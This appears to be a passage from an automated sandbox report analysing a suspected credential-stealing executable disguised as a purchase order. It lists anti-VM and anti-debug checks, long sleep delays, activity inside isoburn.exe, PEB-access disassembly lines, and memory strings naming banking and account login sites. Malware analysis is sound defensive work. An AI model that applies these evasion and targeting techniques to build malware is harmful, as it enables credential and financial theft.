                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Purchase Order..exe PID: 1160, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\isoburn.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Users\user\Desktop\Purchase Order..exeMemory allocated: 1640000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeMemory allocated: 3050000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeMemory allocated: 7F00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeMemory allocated: 76F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeMemory allocated: 8F00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeMemory allocated: 9F00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A096E rdtsc 3_2_018A096E
                Source: C:\Users\user\Desktop\Purchase Order..exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 3846Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeWindow / User API: threadDelayed 6127Jump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\isoburn.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\Purchase Order..exe TID: 3508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 2768Thread sleep count: 3846 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 2768Thread sleep time: -7692000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 2768Thread sleep count: 6127 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exe TID: 2768Thread sleep time: -12254000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\isoburn.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\isoburn.exeCode function: 6_2_0070C4E0 FindFirstFileW,FindNextFileW,FindClose,6_2_0070C4E0
                Source: C:\Users\user\Desktop\Purchase Order..exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                Source: l420377x.6.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: l420377x.6.drBinary or memory string: discord.comVMware20,11696494690f
                Source: l420377x.6.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: l420377x.6.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: l420377x.6.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: l420377x.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: jfBrBcvTIMPfDU.exe, 00000009.00000002.2660933192.0000000000CFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
                Source: l420377x.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: l420377x.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: l420377x.6.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: l420377x.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rtal.azure.comVMware20,11696494690
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e365.comVMware20,11696494690t
                Source: l420377x.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: l420377x.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: l420377x.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: last_fourVARCHARVMware
                Source: isoburn.exe, 00000006.00000002.2660079922.0000000000AE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: l420377x.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: l420377x.6.drBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: l420377x.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690Ad
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: l420377x.6.drBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: l420377x.6.drBinary or memory string: global block list test formVMware20,11696494690
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ve Brokers - EU East & CentralVMware20,11696494690
                Source: l420377x.6.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: l420377x.6.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: l420377x.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,1
                Source: l420377x.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: l420377x.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: isoburn.exe, 00000006.00000002.2665375023.0000000007D05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Transaction PasswordVMware20,11696494690}
                Source: l420377x.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: firefox.exe, 0000000B.00000002.2131917870.0000017B7C30D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
                Source: l420377x.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A096E rdtsc 3_2_018A096E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_00417723 LdrLoadDll,3_2_00417723
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A0185 mov eax, dword ptr fs:[00000030h]3_2_018A0185
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01904180 mov eax, dword ptr fs:[00000030h]3_2_01904180
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01904180 mov eax, dword ptr fs:[00000030h]3_2_01904180
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E019F mov eax, dword ptr fs:[00000030h]3_2_018E019F
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E019F mov eax, dword ptr fs:[00000030h]3_2_018E019F
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E019F mov eax, dword ptr fs:[00000030h]3_2_018E019F
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E019F mov eax, dword ptr fs:[00000030h]3_2_018E019F
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185A197 mov eax, dword ptr fs:[00000030h]3_2_0185A197
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185A197 mov eax, dword ptr fs:[00000030h]3_2_0185A197
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185A197 mov eax, dword ptr fs:[00000030h]3_2_0185A197
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0191C188 mov eax, dword ptr fs:[00000030h]3_2_0191C188
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0191C188 mov eax, dword ptr fs:[00000030h]3_2_0191C188
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019261C3 mov eax, dword ptr fs:[00000030h]3_2_019261C3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019261C3 mov eax, dword ptr fs:[00000030h]3_2_019261C3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DE1D0 mov eax, dword ptr fs:[00000030h]3_2_018DE1D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DE1D0 mov eax, dword ptr fs:[00000030h]3_2_018DE1D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DE1D0 mov ecx, dword ptr fs:[00000030h]3_2_018DE1D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DE1D0 mov eax, dword ptr fs:[00000030h]3_2_018DE1D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018DE1D0 mov eax, dword ptr fs:[00000030h]3_2_018DE1D0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018901F8 mov eax, dword ptr fs:[00000030h]3_2_018901F8
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019361E5 mov eax, dword ptr fs:[00000030h]3_2_019361E5
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01920115 mov eax, dword ptr fs:[00000030h]3_2_01920115
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190A118 mov ecx, dword ptr fs:[00000030h]3_2_0190A118
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190A118 mov eax, dword ptr fs:[00000030h]3_2_0190A118
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190A118 mov eax, dword ptr fs:[00000030h]3_2_0190A118
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190A118 mov eax, dword ptr fs:[00000030h]3_2_0190A118
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E10E mov eax, dword ptr fs:[00000030h]3_2_0190E10E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E10E mov ecx, dword ptr fs:[00000030h]3_2_0190E10E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E10E mov eax, dword ptr fs:[00000030h]3_2_0190E10E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E10E mov eax, dword ptr fs:[00000030h]3_2_0190E10E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E10E mov ecx, dword ptr fs:[00000030h]3_2_0190E10E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E10E mov eax, dword ptr fs:[00000030h]3_2_0190E10E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E10E mov eax, dword ptr fs:[00000030h]3_2_0190E10E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E10E mov ecx, dword ptr fs:[00000030h]3_2_0190E10E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E10E mov eax, dword ptr fs:[00000030h]3_2_0190E10E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E10E mov ecx, dword ptr fs:[00000030h]3_2_0190E10E
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01890124 mov eax, dword ptr fs:[00000030h]3_2_01890124
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F4144 mov eax, dword ptr fs:[00000030h]3_2_018F4144
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F4144 mov eax, dword ptr fs:[00000030h]3_2_018F4144
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F4144 mov ecx, dword ptr fs:[00000030h]3_2_018F4144
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F4144 mov eax, dword ptr fs:[00000030h]3_2_018F4144
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F4144 mov eax, dword ptr fs:[00000030h]3_2_018F4144
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01866154 mov eax, dword ptr fs:[00000030h]3_2_01866154
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01866154 mov eax, dword ptr fs:[00000030h]3_2_01866154
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185C156 mov eax, dword ptr fs:[00000030h]3_2_0185C156
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F8158 mov eax, dword ptr fs:[00000030h]3_2_018F8158
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186208A mov eax, dword ptr fs:[00000030h]3_2_0186208A
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F80A8 mov eax, dword ptr fs:[00000030h]3_2_018F80A8
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019260B8 mov eax, dword ptr fs:[00000030h]3_2_019260B8
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019260B8 mov ecx, dword ptr fs:[00000030h]3_2_019260B8
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E20DE mov eax, dword ptr fs:[00000030h]3_2_018E20DE
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0185A0E3
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E60E0 mov eax, dword ptr fs:[00000030h]3_2_018E60E0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018680E9 mov eax, dword ptr fs:[00000030h]3_2_018680E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185C0F0 mov eax, dword ptr fs:[00000030h]3_2_0185C0F0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018A20F0 mov ecx, dword ptr fs:[00000030h]3_2_018A20F0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E4000 mov ecx, dword ptr fs:[00000030h]3_2_018E4000
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01902000 mov eax, dword ptr fs:[00000030h]3_2_01902000
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01902000 mov eax, dword ptr fs:[00000030h]3_2_01902000
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01902000 mov eax, dword ptr fs:[00000030h]3_2_01902000
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01902000 mov eax, dword ptr fs:[00000030h]3_2_01902000
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01902000 mov eax, dword ptr fs:[00000030h]3_2_01902000
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01902000 mov eax, dword ptr fs:[00000030h]3_2_01902000
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01902000 mov eax, dword ptr fs:[00000030h]3_2_01902000
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01902000 mov eax, dword ptr fs:[00000030h]3_2_01902000
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187E016 mov eax, dword ptr fs:[00000030h]3_2_0187E016
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187E016 mov eax, dword ptr fs:[00000030h]3_2_0187E016
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187E016 mov eax, dword ptr fs:[00000030h]3_2_0187E016
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187E016 mov eax, dword ptr fs:[00000030h]3_2_0187E016
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185A020 mov eax, dword ptr fs:[00000030h]3_2_0185A020
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185C020 mov eax, dword ptr fs:[00000030h]3_2_0185C020
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018F6030 mov eax, dword ptr fs:[00000030h]3_2_018F6030
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01862050 mov eax, dword ptr fs:[00000030h]3_2_01862050
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E6050 mov eax, dword ptr fs:[00000030h]3_2_018E6050
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188C073 mov eax, dword ptr fs:[00000030h]3_2_0188C073
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188438F mov eax, dword ptr fs:[00000030h]3_2_0188438F
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0188438F mov eax, dword ptr fs:[00000030h]3_2_0188438F
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185E388 mov eax, dword ptr fs:[00000030h]3_2_0185E388
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185E388 mov eax, dword ptr fs:[00000030h]3_2_0185E388
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185E388 mov eax, dword ptr fs:[00000030h]3_2_0185E388
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01858397 mov eax, dword ptr fs:[00000030h]3_2_01858397
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01858397 mov eax, dword ptr fs:[00000030h]3_2_01858397
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01858397 mov eax, dword ptr fs:[00000030h]3_2_01858397
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019043D4 mov eax, dword ptr fs:[00000030h]3_2_019043D4
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_019043D4 mov eax, dword ptr fs:[00000030h]3_2_019043D4
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018683C0 mov eax, dword ptr fs:[00000030h]3_2_018683C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018683C0 mov eax, dword ptr fs:[00000030h]3_2_018683C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018683C0 mov eax, dword ptr fs:[00000030h]3_2_018683C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018683C0 mov eax, dword ptr fs:[00000030h]3_2_018683C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A3C0 mov eax, dword ptr fs:[00000030h]3_2_0186A3C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A3C0 mov eax, dword ptr fs:[00000030h]3_2_0186A3C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A3C0 mov eax, dword ptr fs:[00000030h]3_2_0186A3C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A3C0 mov eax, dword ptr fs:[00000030h]3_2_0186A3C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A3C0 mov eax, dword ptr fs:[00000030h]3_2_0186A3C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0186A3C0 mov eax, dword ptr fs:[00000030h]3_2_0186A3C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E3DB mov eax, dword ptr fs:[00000030h]3_2_0190E3DB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E3DB mov eax, dword ptr fs:[00000030h]3_2_0190E3DB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E3DB mov ecx, dword ptr fs:[00000030h]3_2_0190E3DB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190E3DB mov eax, dword ptr fs:[00000030h]3_2_0190E3DB
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E63C0 mov eax, dword ptr fs:[00000030h]3_2_018E63C0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0191C3CD mov eax, dword ptr fs:[00000030h]3_2_0191C3CD
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018703E9 mov eax, dword ptr fs:[00000030h]3_2_018703E9
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018963FF mov eax, dword ptr fs:[00000030h]3_2_018963FF
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187E3F0 mov eax, dword ptr fs:[00000030h]3_2_0187E3F0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187E3F0 mov eax, dword ptr fs:[00000030h]3_2_0187E3F0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0187E3F0 mov eax, dword ptr fs:[00000030h]3_2_0187E3F0
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189A30B mov eax, dword ptr fs:[00000030h]3_2_0189A30B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189A30B mov eax, dword ptr fs:[00000030h]3_2_0189A30B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0189A30B mov eax, dword ptr fs:[00000030h]3_2_0189A30B
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0185C310 mov ecx, dword ptr fs:[00000030h]3_2_0185C310
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01880310 mov ecx, dword ptr fs:[00000030h]3_2_01880310
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0192A352 mov eax, dword ptr fs:[00000030h]3_2_0192A352
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_01908350 mov ecx, dword ptr fs:[00000030h]3_2_01908350
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E2349 mov eax, dword ptr fs:[00000030h]3_2_018E2349
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E035C mov eax, dword ptr fs:[00000030h]3_2_018E035C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E035C mov eax, dword ptr fs:[00000030h]3_2_018E035C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E035C mov eax, dword ptr fs:[00000030h]3_2_018E035C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E035C mov ecx, dword ptr fs:[00000030h]3_2_018E035C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E035C mov eax, dword ptr fs:[00000030h]3_2_018E035C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_018E035C mov eax, dword ptr fs:[00000030h]3_2_018E035C
                Source: C:\Users\user\Desktop\Purchase Order..exeCode function: 3_2_0190437C mov eax, dword ptr fs:[00000030h]3_2_0190437C
